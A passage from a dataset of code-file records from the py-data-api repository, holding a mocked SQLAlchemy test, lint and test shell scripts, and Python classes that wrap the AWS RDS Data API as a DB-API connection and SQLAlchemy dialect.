\"name\",\n \"name\": \"name\",\n \"nullable\": 1,\n \"precision\": 255,\n \"scale\": 0,\n \"schemaName\": \"\",\n \"tableName\": \"users\",\n \"type\": 12,\n \"typeName\": \"VARCHAR\",\n }\n ],\n },\n {\n 'columnMetadata': [\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': True,\n 'isCurrency': False,\n 'isSigned': False,\n 'label': 'current_schema',\n 'name': 'current_schema',\n 'nullable': 2,\n 'precision': 2147483647,\n 'scale': 0,\n 'tableName': '',\n 'type': 12,\n 'typeName': 'name',\n }\n ],\n 'numberOfRecordsUpdated': 0,\n 'records': [[{'stringValue': 'public'}]],\n },\n {'records': [[{'stringValue': 'test plain returns'}]]},\n {'records': [[{'stringValue': 'test unicode returns'}]]},\n {\n 'columnMetadata': [\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': True,\n 'isCurrency': False,\n 'isSigned': False,\n 'label': 'transaction_isolation',\n 'name': 'transaction_isolation',\n 'nullable': 2,\n 'precision': 2147483647,\n 'scale': 0,\n 'tableName': '',\n 'type': 12,\n 'typeName': 'text',\n }\n ],\n 'numberOfRecordsUpdated': 0,\n 'records': [[{'stringValue': 'read committed'}]],\n },\n {\n 'columnMetadata': [\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': True,\n 'isCurrency': False,\n 'isSigned': False,\n 'label': 'standard_conforming_strings',\n 'name': 'standard_conforming_strings',\n 'nullable': 2,\n 'precision': 2147483647,\n 'scale': 0,\n 'tableName': '',\n 'type': 12,\n 'typeName': 'text',\n }\n ],\n 'numberOfRecordsUpdated': 0,\n 'records': [[{'stringValue': 'on'}]],\n },\n {\n 'numberOfRecordsUpdated': 0,\n 'records': [[{'longValue': 1}, {'stringValue': 'cat'}]],\n \"columnMetadata\": [\n {\n \"arrayBaseColumnType\": 0,\n \"isAutoIncrement\": False,\n \"isCaseSensitive\": False,\n \"isCurrency\": False,\n \"isSigned\": True,\n \"label\": \"id\",\n \"name\": \"id\",\n \"nullable\": 1,\n \"precision\": 11,\n \"scale\": 0,\n \"schemaName\": \"\",\n \"tableName\": \"users\",\n \"type\": 4,\n \"typeName\": \"INT\",\n },\n {\n \"arrayBaseColumnType\": 0,\n \"isAutoIncrement\": False,\n \"isCaseSensitive\": False,\n \"isCurrency\": False,\n \"isSigned\": False,\n \"label\": \"name\",\n \"name\": \"name\",\n \"nullable\": 1,\n \"precision\": 255,\n \"scale\": 0,\n \"schemaName\": \"\",\n \"tableName\": \"users\",\n \"type\": 12,\n \"typeName\": \"VARCHAR\",\n },\n ],\n },\n ]\n engine = create_engine(\n 'postgresql+pydataapi://',\n connect_args={\n 'resource_arn': 'arn:aws:rds:us-east-1:123456789012:cluster:dummy',\n 'secret_arn': 'arn:aws:secretsmanager:us-east-1:123456789012:secret:dummy',\n 'database': 'test',\n 'client': mocked_client,\n },\n )\n\n result: ResultProxy = engine.execute(\"select * from pets\")\n assert result.fetchall() == [(1, 'cat')]\n" }, { "alpha_fraction": 0.7459677457809448, "alphanum_fraction": 0.7580645084381104, "avg_line_length": 40.5, "blob_id": "9d694a461c2534ceca33c49888aa593334da6357", "content_id": "a278e5116fe2a2bf8b6383485b289983031ab8f3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 248, "license_type": "permissive", "max_line_length": 98, "num_lines": 6, "path": "/scripts/lint.sh", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nset -e\n\nblack pydataapi tests --check --skip-string-normalization\nisort --recursive --check-only -w 88 --combine-as --thirdparty pydataapi pydataapi tests -m 3 -tc\nmypy pydataapi --disallow-untyped-defs --ignore-missing-imports" }, { "alpha_fraction": 0.7760617733001709, "alphanum_fraction": 0.7799227833747864, "avg_line_length": 42.33333206176758, "blob_id": "a2c8f3f2e8e81e82678b1f30df47d63c0166b7a9", "content_id": "2c8e1e85ab3e3314ee43bec2866d3b811388b48a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 259, "license_type": "permissive", "max_line_length": 131, "num_lines": 6, "path": "/scripts/test.sh", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nset -e\n\nexport AWS_DEFAULT_REGION=us-west-2\npytest --cov=pydataapi --ignore-glob=tests/integration/** tests\npytest --docker-compose-no-build --use-running-containers --docker-compose=tests/integration/docker-compose.yml tests/integration/" }, { "alpha_fraction": 0.5216178297996521, "alphanum_fraction": 0.5244072675704956, "avg_line_length": 39.97142791748047, "blob_id": "e80d5aee39eae7d12dc63ed29879d7239f44c39b", "content_id": "eb02206d72300250d1a5565c2369a2ae41d3dc53", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2868, "license_type": "permissive", "max_line_length": 79, "num_lines": 70, "path": "/pydataapi/WrappedDataAPI.py", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "import boto3\nfrom sqlalchemy.orm import Query\nfrom sqlalchemy import func\nfrom pydataapi import Result, DataAPI\nfrom typing import (\n Any,\n Dict,\n Optional,\n Type,\n Union,\n)\nfrom sqlalchemy.sql import Insert, Delete, Select, Update\nfrom WrappedResult import WrappedResult\n\n\nclass WrappedDataAPI(DataAPI):\n\n def __init__(self,\n *,\n secret_arn: str,\n resource_arn: Optional[str] = None,\n resource_name: Optional[str] = None,\n database: Optional[str] = None,\n transaction_id: Optional[str] = None,\n client: Optional[boto3.session.Session.client] = None,\n rollback_exception: Optional[Type[Exception]] = None,\n rds_client: Optional[boto3.session.Session.client] = None,):\n\n super().__init__(secret_arn=secret_arn, resource_arn=resource_arn,\n resource_name=resource_name, database=database,\n transaction_id=transaction_id, client=client,\n rollback_exception=rollback_exception,\n rds_client=rds_client)\n\n def _get_start_end(self, end, start=0, limit=999):\n while True:\n if start + limit >= end:\n yield (start, end)\n break\n tmp_end = start + limit\n yield (start, tmp_end)\n start = tmp_end\n start += 1\n\n def execute(self,\n query: Union[Query, Insert, Update, Delete, Select, str],\n parameters: Optional[Dict[str, Any]] = None,\n transaction_id: Optional[str] = None,\n continue_after_timeout: bool = True,\n database: Optional[str] = None,\n ) -> WrappedResult:\n if isinstance(query, (Query, Select)):\n qCount: Query = query.statement.with_only_columns([func.count()])\\\n .order_by(None)\n result: Result = super().execute(qCount)\n query_total: int = result.scalar()\n final_result = list()\n for start, end in self._get_start_end(query_total):\n sliceQuery: Query = query.slice(start, end)\n result: Result = super().execute(sliceQuery, parameters,\n transaction_id,\n continue_after_timeout,\n database)\n final_result.append(result)\n wResult: WrappedResult = WrappedResult(final_result)\n else:\n result: Result = super().execute(query, parameters, transaction_id,\n continue_after_timeout, database)\n wResult: WrappedResult = WrappedResult([result])\n return wResult\n" }, { "alpha_fraction": 0.5843662023544312, "alphanum_fraction": 0.5865146517753601, "avg_line_length": 28.37378692626953, "blob_id": "50c7f27fd22aca2f28fe48344d7152fc507d0a97", "content_id": "2ae62a166af6579f567a8f7df39cb7ddfd62df23", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6051, "license_type": "permissive", "max_line_length": 86, "num_lines": 206, "path": "/pydataapi/dbapi.py", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "from typing import Any, Dict, Iterator, List, Optional, Tuple, Type\n\nimport boto3\nfrom pydantic import BaseModel\n\nfrom .pydataapi import DataAPI\n\napilevel: str = '2.0'\nthreadsafety: int = 2\nparamstyle: str = 'named'\n\n\ndef get_description(column_metadata: List[Dict[str, Any]]) -> Tuple:\n return tuple(\n (\n meta['label'], # name\n 0, # type_code,\n 0, # display_size,\n 0, # internal_size,\n meta['precision'], # precision,\n meta['scale'], # scale,\n meta['nullable'],\n )\n for meta in column_metadata\n )\n\n\nclass Error(Exception):\n pass\n\n\nclass ConnectArgs(BaseModel):\n secret_arn: str\n resource_arn: Optional[str]\n resource_name: Optional[str]\n database: Optional[str] = None\n transaction_id: Optional[str] = None\n client: Optional[Any] = None\n rollback_exception: Optional[Type[Exception]] = None\n rds_client: Optional[Any] = None\n\n\nclass Connection:\n paramstyle = paramstyle\n Error = Error\n\n def __init__(self, **kwargs: Any) -> None:\n connect_args = ConnectArgs.parse_obj(kwargs)\n self._data_api = DataAPI(\n secret_arn=connect_args.secret_arn,\n resource_arn=connect_args.resource_arn,\n resource_name=connect_args.resource_name,\n database=connect_args.database,\n transaction_id=connect_args.transaction_id,\n client=connect_args.client,\n rollback_exception=connect_args.rollback_exception,\n rds_client=connect_args.rds_client,\n )\n\n self.closed = False\n self.cursors: List[Cursor] = []\n\n def close(self) -> None:\n self.closed = True\n\n def commit(self) -> None:\n if self._data_api.transaction_id:\n self._data_api.commit()\n self._data_api._transaction_id = None\n\n def rollback(self) -> None:\n if self._data_api.transaction_id:\n self._data_api.rollback()\n self._data_api._transaction_id = None\n\n def cursor(self) -> 'Cursor':\n if not self._data_api.transaction_id:\n self._data_api.begin()\n cursor = Cursor(self._data_api)\n self.cursors.append(cursor)\n\n return cursor\n\n @classmethod\n def connect(cls, **kwargs: Any) -> 'Connection':\n return cls(**kwargs)\n\n def execute(self, operation: Any, parameters: Any = None) -> 'Cursor':\n return self.cursor().execute(operation, parameters)\n\n def __enter__(self) -> 'Connection':\n self._data_api.begin()\n return self\n\n def __exit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:\n if exc_type is None:\n self.commit()\n else:\n if self._data_api.rollback_exception:\n if issubclass(exc_type, self._data_api.rollback_exception):\n self.rollback()\n else:\n self.commit()\n else:\n self.rollback()\n\n\nclass Cursor:\n def __init__(self, data_api: DataAPI) -> None:\n self._data_api: DataAPI = data_api\n self.arraysize = 1\n\n self.closed = False\n\n self.description: Optional[List] = None\n\n self._rows: List[List] = []\n self._rowcount: int = -1\n self._lastrowid: Optional[int] = None\n\n @property\n def rowcount(self) -> int:\n return self._rowcount\n\n @property\n def lastrowid(self) -> Optional[int]:\n return self._lastrowid\n\n def close(self) -> None:\n self.closed = True\n\n def execute(\n self, operation: Any, parameters: Optional[Dict[str, Any]] = None\n ) -> 'Cursor':\n self.description = None\n result = self._data_api.execute(operation, parameters)\n self.description = get_description( # type: ignore\n getattr(result, '_column_metadata')\n )\n rows: List[List] = getattr(result, '_rows')\n self._rows = rows\n self._rowcount = len(rows) or result.number_of_records_updated\n self._lastrowid = result.generated_fields_first # type: ignore\n return self\n\n def executemany(\n self, operation: Any, seq_of_parameters: Optional[List[Dict[str, Any]]] = None\n ) -> 'Cursor':\n self.description = None\n results = self._data_api.batch_execute(operation, seq_of_parameters)\n self._rows = [result.generated_fields for result in results]\n self._rowcount = len(self._rows)\n self.description = []\n self._lastrowid = ( # type: ignore\n results[-1].generated_fields_first if results else None # type: ignore\n )\n return self\n\n def fetchone(self) -> Optional[List]:\n try:\n return self._rows.pop(0)\n except IndexError:\n return None\n\n def fetchmany(self, size: Optional[int] = None) -> List[List]:\n size = size or self.arraysize\n result, self._rows = self._rows[:size], self._rows[size:]\n return result\n\n def fetchall(self) -> List[List]:\n rows = self._rows\n self._rows = []\n return rows\n\n def setinputsizes(self, sizes: Any) -> None: # pragma: no cover\n pass\n\n def setoutputsizes(self, sizes: Any) -> None: # pragma: no cover\n pass\n\n def __iter__(self) -> Iterator[List]:\n return iter(self._rows)\n\n\ndef connect(\n secret_arn: str,\n resource_arn: Optional[str] = None,\n resource_name: Optional[str] = None,\n database: Optional[str] = None,\n transaction_id: Optional[str] = None,\n client: Optional[boto3.session.Session.client] = None,\n rollback_exception: Optional[Type[Exception]] = None,\n rds_client: Optional[boto3.session.Session.client] = None,\n **kwargs: Any\n) -> Connection:\n return Connection(\n secret_arn=secret_arn,\n resource_arn=resource_arn,\n resource_name=resource_name,\n database=database,\n transaction_id=transaction_id,\n client=client,\n rollback_exception=rollback_exception,\n rds_client=rds_client,\n **kwargs\n )\n" }, { "alpha_fraction": 0.6093396544456482, "alphanum_fraction": 0.6107797026634216, "avg_line_length": 26.15642547607422, "blob_id": "8d62005546bcdcba850da68acff7f7855cf6f29a", "content_id": "0f54f4266b5e82e4e6cbf61e0ba141f0f2c3948b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4861, "license_type": "permissive", "max_line_length": 88, "num_lines": 179, "path": "/pydataapi/dialect.py", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "from abc import ABC\nfrom typing import Any, Type\n\nfrom pydataapi.dbapi import Connection\nfrom sqlalchemy.dialects.mysql.base import (\n MySQLCompiler,\n MySQLDDLCompiler,\n MySQLDialect,\n MySQLIdentifierPreparer,\n MySQLTypeCompiler,\n)\nfrom sqlalchemy.dialects.postgresql.base import (\n PGCompiler,\n PGDDLCompiler,\n PGDialect,\n PGIdentifierPreparer,\n PGInspector,\n PGTypeCompiler,\n)\nfrom sqlalchemy.engine.default import DefaultDialect\n\n\nclass DataAPIDialect(DefaultDialect, ABC):\n driver: str = 'dataapi'\n supports_alter = True\n\n supports_native_boolean = True\n\n max_identifier_length = 255\n max_index_name_length = 64\n\n supports_native_enum = False\n\n supports_sane_rowcount = True\n supports_sane_multi_rowcount = False\n supports_multivalues_insert = True\n\n supports_comments = True\n inline_comments = True\n\n cte_follows_insert = True\n\n _backslash_escapes = True\n _server_ansiquotes = False\n\n @classmethod\n def dbapi(cls) -> Type[Connection]:\n return Connection\n\n def get_columns(\n self, connection: Any, table_name: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_primary_keys(\n self, connection: Any, table_name: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_foreign_keys(\n self, connection: Any, table_name: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_table_names(\n self, connection: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_temp_table_names(\n self, connection: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_view_names(\n self, connection: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_temp_view_names(\n self, connection: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_view_definition(\n self, connection: Any, view_name: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_indexes(\n self, connection: Any, table_name: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_unique_constraints(\n self, connection: Any, table_name: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_check_constraints(\n self, connection: Any, table_name: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_table_comment(\n self, connection: Any, table_name: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def normalize_name(self, name: Any) -> None: # pragma: no cover\n pass\n\n def denormalize_name(self, name: Any) -> None: # pragma: no cover\n pass\n\n def has_table(\n self, connection: Any, table_name: Any, schema: Any = None\n ) -> None: # pragma: no cover\n pass\n\n def has_sequence(\n self, connection: Any, sequence_name: Any, schema: Any = None\n ) -> None: # pragma: no cover\n pass\n\n def _get_server_version_info(self, connection: Any) -> None: # pragma: no cover\n pass\n\n def _get_default_schema_name(self, connection: Any) -> None: # pragma: no cover\n pass\n\n def do_begin_twophase(self, connection: Any, xid: Any) -> None: # pragma: no cover\n pass\n\n def do_prepare_twophase(\n self, connection: Any, xid: Any\n ) -> None: # pragma: no cover\n pass\n\n def do_rollback_twophase(\n self, connection: Any, xid: Any, is_prepared: bool = True, recover: bool = False\n ) -> None: # pragma: no cover\n pass\n\n def do_commit_twophase(\n self, connection: Any, xid: Any, is_prepared: bool = True, recover: bool = False\n ) -> None: # pragma: no cover\n pass\n\n def do_recover_twophase(self, connection: Any) -> None: # pragma: no cover\n pass\n\n def set_isolation_level(\n self, dbapi_conn: Any, level: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_isolation_level(self, dbapi_conn: Any) -> None: # pragma: no cover\n pass\n\n\nclass MySQLDataAPIDialect(MySQLDialect, DataAPIDialect):\n def _extract_error_code(self, exception: Exception) -> Any: # pragma: no cover\n pass\n\n def _detect_charset(self, connection: Any) -> Any: # pragma: no cover\n pass\n\n name = \"mysql\"\n default_paramstyle = \"named\"\n\n\nclass PostgreSQLDataAPIDialect(PGDialect, DataAPIDialect):\n name = \"postgresql\"\n default_paramstyle = \"named\"\n supports_alter = True\n max_identifier_length = 63\n supports_sane_rowcount = True\n isolation_level = None\n" }, { "alpha_fraction": 0.5641025900840759, "alphanum_fraction": 0.5710325837135315, "avg_line_length": 34.19512176513672, "blob_id": "06e27425dafeadaab40410514a181ee6d452d0b8", "content_id": "4f8fc79b89e3440732a3a9ff857450b82d20d854", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1443, "license_type": "permissive", "max_line_length": 79, "num_lines": 41, "path": "/pydataapi/WrappedResult.py", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "from pydataapi import Result\nfrom typing import (\n Any,\n Dict,\n List,\n Optional,\n Sequence,\n)\n\n\nclass WrappedResult(Result):\n def __init__(self, result_list: Sequence[Result], isSelect=False):\n self._number_of_records_updated = 0\n self._column_metadata: List[Dict[str, Any]] = list()\n self._rows = list()\n self._index: int = -1\n self._headers: Optional[List[str]] = None\n self.generatedFields: List[Any] = list()\n self.last_generatedFields: Any = 0\n for result in result_list:\n self._rows += result._rows\n self._column_metadata += result._column_metadata\n self._number_of_records_updated += result.number_of_records_updated\n if \"generatedFields\" in result._response and len(\n result._response[\"generatedFields\"]) > 0:\n self.generatedFields.append(\n [list(f.values())[0] for f in\n result._response[\"generatedFields\"]][0]\n )\n self.last_generatedFields = self.generatedFields[-1]\n if len(result_list) > 0:\n self._headers = result_list[0].headers\n self._response = result_list[0].headers\n\n @property\n def number_of_records_updated(self) -> int:\n return self._number_of_records_updated\n\n @property\n def headers(self) -> List[str]:\n return self._headers\n" } ]
10
WangMingJue/LeetCode
https://github.com/WangMingJue/LeetCode
279400aeca4cec6f93c24c99104040c9d6f11180
63332f39c0651fb5b1ab1e3bb8289f7ea857a10a
e7dfaca90f297fa7007290346d0278237c6cfa9e
refs/heads/main
2023-05-09T21:42:22.167311
2021-05-21T08:01:53
2021-05-21T08:01:53
369,459,261
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5346432328224182, "alphanum_fraction": 0.5646328926086426, "avg_line_length": 20.977272033691406, "blob_id": "536e263743e25eb86f86b2cb679e41161930fc98", "content_id": "b5f00b3bfc90d057c074e584db79c9255a738190", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1275, "license_type": "no_license", "max_line_length": 52, "num_lines": 44, "path": "/Question_14/Answer_2.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n1. 先判断strs的个数,如果为0,则返回“”;如果为1,则返回那个元素\n2. 对strs列表进行排序,方便相同字符串的顺序\n3. 对strs列表进行for循环\n4. 设置一个junge_str,这是想要匹配的前缀,初始为第一个元素本身,随着循环不断去除最后一个字符\n5. 然后再用junge_str对整个sts进行循环,如果junge_str不匹配某个元素,就进行下一轮\n\"\"\"\n\n\ndef get_is_same(self, junge_str, strs):\n for other in strs:\n try:\n if other.index(junge_str) != 0:\n return False\n except:\n return False\n return True\n\n\ndef longestCommonPrefix(self, strs):\n str_len = len(strs)\n if str_len == 0:\n return \"\"\n if str_len == 1:\n return strs[0]\n strs.sort()\n str_len = len(strs[0])\n junge_str = \"\"\n for i in range(str_len):\n junge_str = strs[0][:(-1) * i]\n if i == 0:\n junge_str = strs[0]\n if self.get_is_same(junge_str, strs):\n break\n else:\n junge_str = \"\"\n continue\n return junge_str\n\n\n\"\"\"\n执行用时:32 ms, 在所有 Python3 提交中击败了98%的用户\n内存消耗:14.7 MB, 在所有 Python3 提交中击败了98.03%的用户\n\"\"\"\n" }, { "alpha_fraction": 0.5277161598205566, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 17.040000915527344, "blob_id": "d90df86a1e1ee930911cd8eabedd11d7f7f04856", "content_id": "79a22c01c4d7d96732720f1c3635efd62b34dab5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 735, "license_type": "no_license", "max_line_length": 51, "num_lines": 25, "path": "/Question_7/Answer_1.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n1. 先使用sign来存储x的正负符号,如果为负,则进行绝对值处理\n2. 将x转化为字符串类型,再转化成列表类型\n3. 然后反转列表,再转化成字符串类型,再转化成数字类型\n4. 最后乘以正负符号\n5. 判断反转后的数字是不是在[−2的31次方, 2的31次方 − 1]中,不在返回0,在的话返回x\n\"\"\"\nx = 1534236469\n\nsign = 1\nif x < 0:\n sign = -1\n x = abs(x)\ntmp = list(str(x))\ntmp.reverse()\ntmp = int(\"\".join(tmp))\ntmp = tmp * sign\nif tmp < -2 ** 31 or tmp > 2 ** 31 - 1:\n print(0)\nprint(tmp)\n\n\"\"\"\n执行用时:40 ms, 在所有 Python3 提交中击败了77.68%的用户\n内存消耗:14.9 MB, 在所有 Python3 提交中击败了41.74%的用户\n\"\"\"\n" }, { "alpha_fraction": 0.5635592937469482, "alphanum_fraction": 0.6228813529014587, "avg_line_length": 21.4761905670166, "blob_id": "5d6f702b4ddddaf848c384ea7ac657037a1d3d5b", "content_id": "796a86ba28dc52a07bd6b125541a9cf85017db70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 654, "license_type": "no_license", "max_line_length": 53, "num_lines": 21, "path": "/Question_1/Answer_3.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n1. 使用map函数,依次使用Target减去每个元素,得到一个差值列表A\n2. 循环差值列表A\n3. 获取第i个原值的位置\n4. 再获取nums[i+1]子列表中,差值A在子列表中的位置\n\"\"\"\nnums = [3, 2, 4, 5, 5]\ntarget = 10\n\nfor i in map(lambda x: target - x, nums):\n try:\n start_index = nums.index(target - i)\n end_index = nums[start_index + 1:].index(i)\n print([start_index, end_index+start_index+1])\n break\n except:\n continue\n\"\"\"\n执行用时:852 ms, 在所有 Python3 提交中击败了5.00%的用户\n内存消耗:15 MB, 在所有 Python3 提交中击败了24.23%的用户\n\"\"\"\n" }, { "alpha_fraction": 0.669767439365387, "alphanum_fraction": 0.6825581192970276, "avg_line_length": 32.07692337036133, "blob_id": "5863b2921a46cf368619c1ffa3075eb957b865d0", "content_id": "dab9ef2f255eda93843eda0b39a449a3b8482c70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1080, "license_type": "no_license", "max_line_length": 93, "num_lines": 26, "path": "/CreateQuestionFolder.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n用于创建题目文件夹的模板\n1. 题目文件夹 Question\n2. 解答文件 Answer.py\n3. 题目描述 description.txt\n\"\"\"\nimport os\n\n# 准备创建的题目文件夹个数,数据来自于LeetCode网站\nQuestion_numbers = 1800\n\n# 开始创建\nfor i in range(1, Question_numbers + 1): # 从1开始循环\n current_question_folder = \"./Question_{}\".format(i) # 文件夹变量\n if not os.path.exists(current_question_folder): # 如果文件夹不存在,才会创建\n os.mkdir(current_question_folder)\n\n question_answer_file = \"./{}/Answer_1.py\".format(current_question_folder) # 解答文件变量\n if not os.path.exists(question_answer_file): # 如果文件不存在,才会创建\n answer_file = open(question_answer_file, \"w\")\n answer_file.close()\n\n question_description = \"./{}/description.txt\".format(current_question_folder) # 题目描述文件变量\n if not os.path.exists(question_description): # 如果文件不存在,才会创建\n answer_file = open(question_description, \"w\")\n answer_file.close()\n" }, { "alpha_fraction": 0.5727923512458801, "alphanum_fraction": 0.6443914175033569, "avg_line_length": 21.052631378173828, "blob_id": "a34e94212f13d96e498764925050794167c617d6", "content_id": "6f66c3a395eb7d94dfa6abbb9aafa4ff2081db64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 675, "license_type": "no_license", "max_line_length": 47, "num_lines": 19, "path": "/Question_1/Answer_2.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n1. 循环,依次获取第i个元素,然后使用Target减去这个元素,得到差值A\n2. 对nums列表进行切片,获取nums[i+1]列表,也就是第i个元素后的子列表\n3. 使用in运算符,查看差值A是否在子列表中,如果不在就直接下一次循环\n4. 如果在子列表中,直接返回\n\"\"\"\nnums = [2, 7, 11, 15]\ntarget = 9\n\nfor i in range(len(nums)):\n tmp = target - nums[i]\n if tmp not in nums[i + 1:]:\n continue\n print([i, nums[i + 1:].index(tmp) + i + 1])\n\n\"\"\"\n执行用时:484 ms, 在所有 Python3 提交中击败了5.00%的用户\n内存消耗:14.8 MB, 在所有 Python3 提交中击败了85.64%的用户\n\"\"\"\n" }, { "alpha_fraction": 0.5377026200294495, "alphanum_fraction": 0.5870330929756165, "avg_line_length": 31.272727966308594, "blob_id": "e7e88bf1009e2b6604fa194eede991d2bf221071", "content_id": "63006d53e1759dabc0051048434360cb6578f6a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1737, "license_type": "no_license", "max_line_length": 94, "num_lines": 44, "path": "/Question_13/Answer_1.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n1. 先设置一个字典来存放,罗马数字对应的十进制数字\n2. 把字符串s中的每个字母都转换为相应的数字,形成一个数字列表result_list\n3. 对这个result_list进行循环\n4. 先检查当前第i个元素是否小于第i+1个元素,如果小于,就让第i+1个元素减去第i个元素,存放到result中,且index(指针)要加2\n5. 如果不小于,则直接把第i个元素加到result里,index加1\n\"\"\"\ns = \"MCMXCIV\"\n\nroma_dict = {\"I\": 1, \"V\": 5, \"X\": 10, \"L\": 50, \"C\": 100, \"D\": 500, \"M\": 1000}\nresult_list = list(map(lambda x: roma_dict[x], s))\nresult_list_length = len(result_list)\nresult = 0\nindex = 0\nwhile index < result_list_length:\n if index + 1 < result_list_length and result_list[index] < result_list[index + 1]:\n result += (result_list[index + 1] - result_list[index])\n index += 2\n else:\n result += result_list[index]\n index += 1\nprint(result)\n\n\"\"\"\n执行用时:44 ms, 在所有 Python3 提交中击败了97.84%的用户\n内存消耗:14.7 MB, 在所有 Python3 提交中击败了95.35%的用户\n\"\"\"\n\"\"\"\nroma_dict = {\"I\": 1, \"V\": 5, \"X\": 10, \"L\": 50, \"C\": 100, \"D\": 500, \"M\": 1000}\nclass Solution:\n def romanToInt(self, s: str) -> int:\n result_list = list(map(lambda x: roma_dict[x], s))\n result_list_length = len(result_list)\n result = 0\n index = 0\n while index < result_list_length:\n if index + 1 < result_list_length and result_list[index] < result_list[index + 1]:\n result += (result_list[index + 1] - result_list[index])\n index += 2\n else:\n result += result_list[index]\n index += 1\n return result\n\"\"\"" }, { "alpha_fraction": 0.5211267471313477, "alphanum_fraction": 0.579812228679657, "avg_line_length": 20.299999237060547, "blob_id": "3ef03e93f5af26e6c2194aac3545f5ca6a8cb59c", "content_id": "0f9f10f5098cfd510acddde2a6be91f679c16687", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 648, "license_type": "no_license", "max_line_length": 45, "num_lines": 20, "path": "/Question_1/Answer_1.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n使用两重循环:\n1. 第一重循环,依次获取第i个元素,然后使用Target减去这个元素,得到差值A\n2. 第二重循环,在第i个元素后的列表中,去查找是否存在差值A,如果存在,这就是我们要找的\n\"\"\"\nnums = [2, 7, 11, 15]\ntarget = 9\n\nfor i in range(len(nums)):\n tmp = target - nums[i]\n for j in range(i + 1, len(nums)):\n if nums[j] == tmp:\n print([i, j])\n break\n else:\n continue\n\"\"\"\n执行用时:2296 ms, 在所有 Python3 提交中击败了5.07%的用户\n内存消耗:15.1 MB, 在所有 Python3 提交中击败了5.09%的用户\n\"\"\"\n" }, { "alpha_fraction": 0.5942028760910034, "alphanum_fraction": 0.6753623485565186, "avg_line_length": 15.428571701049805, "blob_id": "d133d10efcf6e6e9cc506b05df5d39e9cb496909", "content_id": "03d8ed598de4f25ca997f11610f209d9640963da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 561, "license_type": "no_license", "max_line_length": 39, "num_lines": 21, "path": "/Question_9/Answer_1.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n1. 先判断是否为负数,如果是的话,则直接返回False\n2. 将x转为字符串类型,再转成列表类型\n3. 对列表进行反转,再转化为数字类型\n4. 如果反转后的数字大小跟x一样,那就返回True,反之为False\n\"\"\"\nx = 1534236469\n\nif x < 0:\n print(False)\ntmp = list(str(x))\ntmp.reverse()\ntmp = int(\"\".join(tmp))\nif tmp == x :\n print(True)\nprint(False)\n\n\"\"\"\n执行用时:68 ms, 在所有 Python3 提交中击败了82.36%的用户\n内存消耗:15 MB, 在所有 Python3 提交中击败了5.32%的用户\n\"\"\"\n" }, { "alpha_fraction": 0.4545454680919647, "alphanum_fraction": 0.5454545617103577, "avg_line_length": 8, "blob_id": "4078b8cb875addd8ad55de28715c78d289049964", "content_id": "81cc94e553eeafb887f6f69b43d9de877a4b60d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 70, "license_type": 